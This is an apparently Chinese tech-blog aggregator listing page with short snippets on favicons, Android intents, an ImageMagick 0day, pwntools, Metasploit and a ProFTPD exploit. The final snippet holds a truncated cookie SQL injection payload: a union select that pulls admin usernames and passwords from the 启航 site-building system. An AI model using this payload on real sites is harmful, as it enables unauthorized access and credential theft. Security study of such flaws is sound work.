1.favicon.ico制作:favicon.ico可以ps制作;“shortcut icon”中间有一个空格 <head> <link rel="shortcut icon" href="favicon.ico"> </head> 2.正则表达式验证邮箱(可自动删除前后的空格) [\s*\w+( ...
分类:
其他好文 时间:
2016-05-13 09:49:16
阅读次数:
127
String ADD_SHORTCUT_ACTION 动作:
在系统中添加一个快捷方式。
"android.intent.action.ADD_SHORTCUT"
String ALL_APPS_ACTION 动作:
列举所有可用的应用。
"android.intent.action.ALL_APPS"
String ALTERNATIVE_CATEGORY 类别:
说...
分类:
其他好文 时间:
2016-05-13 04:26:55
阅读次数:
194
For example we want to generate the code like this: So it is three div, has a id called tab1,2,3 and a class tab. inside the div, has h1 with the cont ...
分类:
Web程序 时间:
2016-05-07 18:15:25
阅读次数:
162
ImageMagick是一款广泛流行的图像处理软件,有无数的网站使用它来进行图像处理,但在本周二,ImageMagick披露出了一个严重的0day漏洞,此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。Slack安全工程师Ryan Hube发现了这一0day漏洞。 在这个安全漏洞 ...
分类:
其他好文 时间:
2016-05-06 09:22:08
阅读次数:
291
pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 安装前确保安装 ...
分类:
其他好文 时间:
2016-05-02 02:09:44
阅读次数:
1153
代码: media = "screen" rel = "stylesheet" rel:relations的缩写,是指的关联到的文件是什么。此处是指关联到一个stylesheet rel = "shortcut icon"和"icon"的区别: shortcut icon特指浏览器地址栏左侧显示的图 ...
分类:
Web程序 时间:
2016-04-28 14:20:20
阅读次数:
167
1.专业术语 1.1 渗透攻击(exploit) 1.2 攻击载荷(payload) 1.3 shellcode 1.4 模块(Module) 1.5 监听器(Listener) 2.Metasploit用户接口 2.1 MSF终端 2.2 MSF命令行 2.3 Armitage 3.Metaspl ...
分类:
Web程序 时间:
2016-04-27 22:28:40
阅读次数:
224
攻击代码网址:http://www.exploit-db.com/exploits/394/ 1、执行环境: 1、ProFTPD 1.3.0/1.3.0a 2、编译ProFTPD时。--enable-ctrls选项必须打开 ./configure --enable-ctrls 2、执行參数: roo ...
分类:
其他好文 时间:
2016-04-19 10:05:40
阅读次数:
235
一、视频学习 1.metasploit的配置及介绍 在使用metasploit的时候,为了能够使用完整的msf数据库查询exploit和记录,我们需要开启PostgreSQL数据库服务和metasploit服务,开启这两个服务的命令行为:service postgresql start 和servi ...
分类:
其他好文 时间:
2016-04-18 01:07:50
阅读次数:
202
启航企业建站系统 cookie注入漏洞通杀所有版本直接上exploit:javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admi ...
分类:
其他好文 时间:
2016-04-18 01:06:20
阅读次数:
2280